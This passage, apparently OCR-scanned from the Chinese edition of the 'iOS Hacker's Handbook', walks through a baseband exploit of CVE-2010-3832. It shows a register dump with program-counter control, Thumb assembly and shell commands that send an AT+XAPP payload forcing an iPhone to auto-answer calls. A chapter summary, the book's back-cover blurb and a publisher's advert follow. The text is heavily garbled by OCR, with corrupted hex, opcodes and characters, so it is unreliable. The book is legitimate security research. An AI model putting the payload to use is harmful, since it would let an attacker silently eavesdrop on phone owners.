r6: 0x66666664 r7: 0xB0016978  r8: 0x00000000 

r9: OxA00028E4  r10: 0xB008E730  r11: 0xB008FE9C 

rl12; 0x45564E54 xz13 : 0xB008FABC 上 14: OxFFFF1360 

xz15: 0x6666666C 

SPSR: 0x60000013 DFAR: 0x00000024 DFSR: 0x00000005 


看 ， 这 不 就 拿 到 程序 计数 器 的 控制 权 了 嘛 ! 看 看 链接 寄存 器 引用 的 区 域 ， 你 就 会 发 现 想 要 从 
































中 返回 的 那个 函数 没有 参数 ,而 且 是 使 用 BL 命令 调用 的 。 为 了 测试 这 是 否 有 效 , 我 们 会 试 着 返回 


到 完成 Bx LR 的 区 域 。 这 也 起 作用 了 ! 在 发 送 以 0xFFFF058cC 作 为 TMSI 第 19 个 字 的 消息 时 没有 生 





成 月 溃 日 志 ， 也 没有 丢失 信和 号。 





最 后 该 来 看 看 如 何 开 启 自 动 应 答 了 。3GPP 的 27.007 规 范 和 ITU 的 T.250 规 范 一 起 , 实现 了 在 指 


定 次 数 的 响 铃 后 强制 自动 应 答 呼 叫 的 功能 。 这 一 响 铃 次 数 是 在 S 寄 存 器 〈( 即 so ) 中 指定 的 ,我们 
可 以 使 用 AI 命令 ars0=n 设 置 该 寄存 器 , 其 中 bn 就 是 响 铃 次 数 ; 还 可 以 通过 ars0? 查 询 该 寄存 器 的 
值 。 我 们 可 以 利用 Argw 把 $ 寄 存 需 的 内 容 存储 到 NVRAM 中 ， 存 储 为 所 谓 的 ATC 摘 述 文件 。 在 利 
用 错误 字符 串 〈error string ) 弄 清楚 是 哪个 函数 在 操作 该 ATC 描 述 文件 后 ， 我 们 就 可 以 驾驭 该 函 
数 从 NVRAM 中 读 写 ， 找 出 ATC 描 述 文件 在 内 存 中 的 格式 。 然 后 ,调用 如 下 所 示 的 














get_at_sreg_value 国 数 ， 查 询 k 置 为 0 时 的 寄存 需 Sn: 


/* 0XAO1B9F1B */ 
uint32 _t _ fastcall get at_ sreg base ptr(uint32 t al, uint32 七 a2) 
{ 

uint32_t *t1; 

uint32_t *t2; 

uint32_t result; 


&dword_ BO1B204C[15 * all; 
&dword_ BO1B23D0[17 * a2]; 
下 并 二 [2] 池 

result = t2[14] + t1[13]; 
else 

result = 0; 
return result; 


} 


/* OxAO1C5AB7 */uint32 tt __ fastcall get at_ sreg value (uint32 t k, uint32_t n) 


{ 
return *(get_ at_sreg base ptr(9, k) + n+ 8); 


于 是 心 生 一 计 : 利用 从 上 述 函 数 中 得 到 的 信息 , 借助 一 个 短小 的 程序 远程 设置 S0 寄 存 器 。 第 
































步 是 要 编写 一 个 汇编 小 程序 ， 利 用 AT+XAPP 洪 出 设置 s0 环 路 计数 器 ， 示 例如 下 : 
00000000 <write_ats0_reg>: 
0: 2107 movs rl, #7 /* 不 能 直接 载 入 #9 (空白 ) */ 
2: 1c88 adds r0, rl1l, #2 /* r0 = 9 */ 
4: 1a49 subs rl1, rl, rl1 /* rl1 = 0 */ 
6: 47a8 blx r5 /* 调用 0xAO01B9F1B */ 
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8: 2401 movs r4, #1 

a: 7204 strb r4, [r0, #8] /* 设置 S0 = 1 */ 

c: 1b20 subs r0, r4, r4 /* Ir0 = 0,， 表示 出 错 */ 
e: bpb00a add sp, #0x28 /* 调整 栈 指针 */ 

10: bd70 pop {r4, r5, r6, pc} /* 和 干净 利落 的 继续 */ 

12: 46c0 nop /* nop 需 要 与 字 边 界 对 齐 */ 





下 面 是 种 测试 以 上 代码 的 原始 方式 : 


# printf 'AT+XAPP="## 提 ## 提 提 # 扩 提 提 村 井 失禁 提 守 打 井 宁 打 提 扩 提 划 扩 提 # 扩 井 # 提 #######' > xapp-bin 
# printf '4444\x1lb\x9f\xlb\xA066667777\xF5\X2C\x0B\xBO' >> xapp-bin 
# printf '\x07\x21\x88\xlc\x49\xla\xa8\x47\x01\x24\x04' >> xapp-bin 
# printf '\x72\x20\xlb\x0a\xb0\x70\xbd\xc0\x46"' >> xapp-bin 

# ./sendmodem "‘cat xapp-bin " 

Sending command to modem: AT 

一 一 一 .十 

AT 

OK 

Sending command to modem: RAT+XAPP=" 井 井 提 井 井 提 井 提 提 井 提 井 井 提 井 井 提 井 井 井 井 井 提 井 井 井 井 井 井 井 井 井 井 井 井 #444466667 
训 汪 这 重 记 


?1?I?GST 

B72F" 

一 . .十 

RAT+XAPPE="# 井 井 提 井 井 提 井 井 提 井 提 提 井 提 井 井 提 井 井 提 井 井 井 井 井 井 井 井 井 井 井 井 井 井 井 #444466667777?， 
?1?I?GST 

p??F" 

ERROR 

./Ssendmodem 'ATSO0?' 

Sending command to modem: AT 

一 .十 

AT 

OK 

Sending command to modem: ATSO? 

一 . . .二 

ATS0O? 

001 





OK 
# 


正如 大 家 所 见 ，AT+XAPP 有 效 载荷 可 以 把 s0 寄 存 带 置 为 1。 如 果 现 在 呼叫 这 部 iPhone， 它 就 
会 在 第 一 次 响 铃 后 自动 应 答 了 。 现 在 只 剩 最 后 一 步 : 构造 有 效 载 集 远程 开启 该 功能 。 

稍微 修改 一 下 上 面 的 有 效 载 荷 , 不 再 写 入 值 而 是 引发 骨 溃 , 你 就 会 发 现 s0 寄 存 器 位 于 内 存 中 
的 0xB002D768 处 。 举 个 例子 ， 大 家 可 以 利用 如 下 指令 片段 远程 开启 自动 应 答 : 


OxAO01EC43C 1C 61 C4 ES5 STRB R6, [R4,#0x11C] 
OxAO01EC440 FO 81 BD E8 LDMFD SP!, {R4-R8,PC} 


注意 ， 在 把 值 1 写 入 上 面 提 到 的 地 址 后 ， 代 码 还 需要 继续 执行 。 总 而 言 之 ， 这 给 了 我 们 一 条 
不 超过 100 字 节 的 消息 ， 而 该 消息 简明 扼要 地 说 明了 CVE-2010-3832 的 可 利用 性 。 






































. 
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11.6 小结 


我 们 全 面 地 介绍 了 针对 iOS 设 备 的 基带 攻击 。 本 章 从 讲述 与 蜂窝 网 络 有 关 的 背景 知识 开始 ， 
一 步 步 向 大 家 展示 了 各 代 iOS 设 备 基带 心 片 上 运行 的 实时 操作 系统 的 内 部 原理 ， 以 及 这 些 实时 操 
作 系 统 的 堆 内 存 管理 程序 的 错综复杂 性 。 

在 介绍 完 这 些 理论 性 很 强 的 知识 后 ,我们 接着 引导 大 家 迅速 着 手 完成 OpenBTS 的 设置 和 运行 工 
作 。 这 一 设置 让 大 家 可 以 在 实验 室 中 为 研究 通过 空中 接口 的 基带 攻击 而 运行 自己 的 GSM 测 试 网 络 。 

然后 , 我 们 剖析 了 实际 的 蜂窝 协议 栈 并 讨论 了 它们 的 受 攻击 面 , 还 为 大 家 介绍 了 可 用 于 自行 
寻找 漏洞 的 一 些 技巧 。 最 后 ， 本 章 提供 了 两 个 已 公开 漏洞 〈 一 个 本 地 漏洞 ， 一 个 远程 漏洞 ) 的 例 
子 ， 并 解释 了 ultrasn0ow 解 锁 工 具 的 工作 原理 。 
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iOS Hacker’s Handbook 


安全 始终 是 计算 机 和 互联 网 领域 最 重要 的 话题 。 进 入 移动 互联 网 时 代 ， 移 动 平 台 和 设备 的 安全 问题 
E/E OE 
但 由 其 自身 漏洞 而 引发 的 威胁 同样 一 直 存 在 。 


《黑客 攻防 技术 宝典 : iOS 实 战 篇 》 由 美国 国家 安全 局 全 球 网 络 漏洞 攻击 分 析 师 、 连 续 4 年 
Pwn2Own 黑 客 竞赛 大 奖 得 主 Charlie Miller 领 衔 ，6 位 业内 顶级 专家 合力 打造 ， 全 面 深入 介绍 了 iOS 的 工作 
原理 、 安 全 架构 、 安 全 风险 ， 揭秘 了 iOS 越 狱 工 作 原 理 ， 探 讨 了 加 密 、 代 码 签 名 、 内 存 保护 、 沙 盒 机 
制 、iPhone 模 糊 测 试 、 漏 洞 攻击 程序 、ROP 有 效 载 荷 、 基 带 攻击 等 内 容 ， 为 深入 理解 和 保护 iOS 设 备 提 
供 了 足够 的 知识 与 工具 ， 是 学 习 iOS 设 备 工作 原理 、 理 解 越狱 和 破解 、 开 展 iOS 漏 洞 研究 的 重量 级 专著 。 


本 书 作为 国内 第 一 本 全 面 介绍 iOS 漏 洞 及 攻防 的 专著 ， 作 者 阵容 空前 豪华 ， 内 容 权 威 性 毋庸 置疑 。 
Charlie Miller 曾 在 美国 国家 安全 局 担任 全 球 网 络 漏洞 攻击 分 析 师 5 年 ， 并 连续 4 届 摘 得 Pwn2Own 黑 客 竞赛 
桂冠 。Dionysus Blazakis 擅 长 漏洞 攻击 缓解 技术 ，2010 年 赢得 了 Pwnie Award 最 具 创 新 研究 奖 。Dino 
Dai Zovi 是 Trail of Bits 联 合 创始 人 和 首席 技术 官 ， 有 十 余年 信息 安全 领域 从 业经 验 ， 出 版 过 两 部 信息 安全 
专著 。Vincenzo lozzo 现 任 BlackHat 和 Shakacon 安 全 会 议 评审 委员 会 委员 ， 因 2010 年 和 2011 年 连续 两 届 
获得 Pwn2Own 比 赛 大 奖 在 信息 安全 领域 名 声 大 振 。Stefan Esser 是 业界 知名 的 PHP 安 全 问题 专家 ， 是 从 
原 厂 XBOX 的 硬盘 上 直接 引导 Linux 成 功 的 第 一 人 。Ralf-Philipp Weinmann 作 为 德国 达 姆 施 塔 特工 业 大 学 
密码 学 博士 、 卢 森 堡 大 学 博士 后 研究 员 ， 对 密码 学 、 移 动 设备 安全 等 都 有 深入 研究 。 


本 书 适 合 想 了 解 iDOS 设 备 工 作 原 理 的 人 ， 适 合 对 越狱 和 破解 感 兴趣 的 人 ， 适 合 关 注 iOS 应 用 及 数据 安 


全 

I 

全 的 开发 人 员 ， 适 合 公司 技术 管理 人 员 ( 他 们 需要 了 解 如 何 保障 iOS 设 备 安 全 ) ， 还 适合 从 事 iOS 漏 洞 研 
究 的 安全 研究 人 员 
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电子 出 版 的 时 代 已 经 来 临 。 在 许多 出 版 界 同行 还 在 犹 图 灵 社 区 进一步 把 传统 出 版 流程 与 电子 书 出 版 业务 
了 豫 簿 香 的 时 候 ， 图 灵 社 区 已 经 采取 实际 行动 拥抱 这 个 紧密 结合 ， 目 前 已 实现 作 译 者 网 上 交 稿 、 编 辑 网 上 
出 版 业 巨变 。 作 为 国内 第 一 家 发 售 电子 图 书 的 IT 类 出 审 稿 、 按 章 发 布 的 电子 出 版 模式 。 这 种 新 的 出 版 模 
版 商 ， 图 灵 社 区 目前 为 读者 提供 两 种 DRM-free 的 阅读 式 ， 我 们 称 之 为 “敏捷 出 版 ”， 它 可 以 让 读者 以 较 
体验 : 在 线 阅读 和 PDF。 快 的 速度 了 解 到 国外 最 新 技术 图 书 的 内 容 ， 弥 补 以 

往 翻 译 版 技术 书 “ 出 版 即 过 时 ”的 缺憾 。 同 时 ， 敏 





























相 比 纸 质 书 ， 电子 书 具 有 许多 明显 的 优势 。 它 不 仅 发 捷 出 版 使 得 作 、 译 、 编 、 读 的 交流 更 为 方便 天 殿 
布 快 ， 更 新 容易 ， 而 且 尽 可 能 采用 了 彩色 图 片 (即使 a 本 ee 

， ， 提前 消灭 书稿 中 的 错误 ， 最 大 程度 地 保证 图 书 出 版 
了 的 书 纸 质 版 是 黑白 印刷 的 ) 。 读 者 还 可 以 方便 地 进 a RD " 
行 搜索 、 剪 贴 、 复 制 和 打印 。 站 

























































































最 方便 的 开放 出 版 平台 最 直接 的 读者 交流 平台 
























































































































































图 灵 社 区 向 读者 开放 在 线 写作 功能 ， 协 助 你 实现 自 出 在 图 灵 社 区 ， 你 可 以 十 分 方便 地 写作 文章 、 提 交 勘 
版 和 开源 出 版 的 梦想 。 利 用 “合集 ”功能 ， 你 就 能 联 误 、 发 表 评 论 ， 以 各 种 方式 与 作 译 者 、 编 辑 人 员 和 
合 二 三 好 友 共 同 创作 一 部 技术 参考 书 ， 以 免费 或 收费 其 他 读者 进行 交流 互动 。 提 交 勘 误 还 能 够 获 赠 社区 
的 形式 提供 给 读者 。 (收费 形式 须 经 过 图 灵 社 区 立项 银子 。 

评审 。) 这 极 大 地 降低 了 出 版 的 门槛 。 只 要 你 有 写作 

的 意愿 ， 图 灵 社 区 就 能 帮助 你 实现 这 个 梦想 。 成 熟 的 你 可 以 积极 参与 社区 经 常 开展 的 访谈 、 审读 、 评选 
书稿 ， 有 机 会 入 选 出 版 计划 ， 同 时 出 版 纸 质 书 。 等 多 种 活动 ， 硫 取 积分 和 银子 ， 积 毗 个 人 声望。 




















图 灵 社 区 引进 出 版 的 外 文 图 书 ， 都 将 在 立项 后 马上 在 
社区 公布 。 如 果 你 有 意 翻 译 哪 本 图 书 ， 欢 迎 你 来 社区 
申请 。 只 要 你 通过 试 译 的 考验 ， 即 可 签约 成 为 图 灵 的 
译 者 。 当 然 ， 要 想 成 功 地 完成 一 本 书 的 翻译 工作 ， 是 
需要 有 坚强 的 妆 力 的 。 
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